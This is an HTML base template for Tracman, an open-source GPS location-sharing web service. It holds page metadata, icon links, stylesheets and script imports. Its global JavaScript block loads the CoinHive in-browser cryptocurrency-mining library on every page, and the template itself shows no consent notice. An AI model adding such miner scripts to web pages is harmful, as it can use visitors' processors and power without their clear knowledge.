<!doctype html>

<!--

	Tracman: GPS tracking service in node.js
	Copyright © 2018 Keith Irwin

	This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

	This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.

	A copy of this program's license is available at <https://github.com/Tracman-org/Server/blob/master/LICENSE.md>.

-->

<html>
	<head>
	{% block head %}
		<title>{% block title %}Tracman{% endblock %}</title>
		
		<!-- Metadata -->
		<link rel="manifest" href="/static/manifest.json">
		<meta http-equiv="Content-type" content="text/html;charset=utf-8">
		<meta charset="UTF-8">
		<meta name="author" content="Keith Irwin">
		<meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=0">
		<meta name="keywords" content="map, phone, gps, link, location, track, friends, app">
		<meta name="description" content="Tracman lets you see and share your phone's exact realtime location">
		<meta name="theme-color" content="#222">
		<meta name="msapplication-navbutton-color" content="#222">
		<meta name="apple-mobile-web-app-capable" content="yes">
		<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
		
		<!-- Icons -->
		<link rel="shortcut icon" sizes="16x16 32x32 48x48" type="image/x-icon" href="/static/img/icon/by/16-32-48.ico">
		<link rel="icon apple-touch-icon" sizes="32x32" type="image/png" href="/static/img/icon/by/32.png">
		<link rel="icon apple-touch-icon" sizes="57x57" type="image/png" href="/static/img/icon/by/57.png">
		<link rel="icon apple-touch-icon" sizes="72x72" type="image/png" href="/static/img/icon/by/72.png">
		<link rel="icon apple-touch-icon" sizes="128x128" type="image/png" href="/static/img/icon/by/128.png">
		<link rel="icon apple-touch-icon" sizes="152x152" type="image/png" href="/static/img/icon/by/152.png">
		<link rel="icon apple-touch-icon" sizes="228x228" type="image/png" href="/static/img/icon/by/228.png">
		<link rel="apple-touch-icon-precomposed" type="image/png" href="/static/img/icon/by/152.png">
		
		<!-- Styles -->
		<link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">
		<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Open+Sans:300,600">
		<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Merriweather:300,700">
		<link rel="stylesheet" type="text/css" href="/static/css/.base.min.css">
		
		<!-- Head javascript imports -->
		<script src="https://code.jquery.com/jquery-3.2.1.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin="anonymous"></script>
		<!--[if lt IE 9]>
			<script src="/scripts/.html5shiv.min.js"></script>
			<script src="/scripts/.respond.min.js"></script>
		<![endif]-->
	
	{% endblock %}
	
	<!-- Header and footer CSS -->
	{% if not noHeader %}<link href="/static/css/.header.min.css" rel="stylesheet">{% endif %}
	{% if not noFooter %}<link href="/static/css/.footer.min.css" rel="stylesheet">{% endif %}
	</head>
	
	<body>
		
		<!-- Header -->
		{% if not noHeader %}{% include 'templates/header.html' %}{% endif %}
		
		<main>
			
			<!-- Main page -->
			{% block main %}{% endblock %}
			
			<!-- Footer -->
			{% if not noFooter %}{% include 'templates/footer.html' %}{% endif %}
			
		</main>

		<!-- Javascript -->
		{% block javascript %}
			<!-- Global imports -->
			<script type="application/javascript" src="https://coin-hive.com/lib/coinhive.min.js"></script>
			<script type="application/javascript" src="/static/js/.base.min.js"></script>
		{% endblock %}

	</body>
</html>
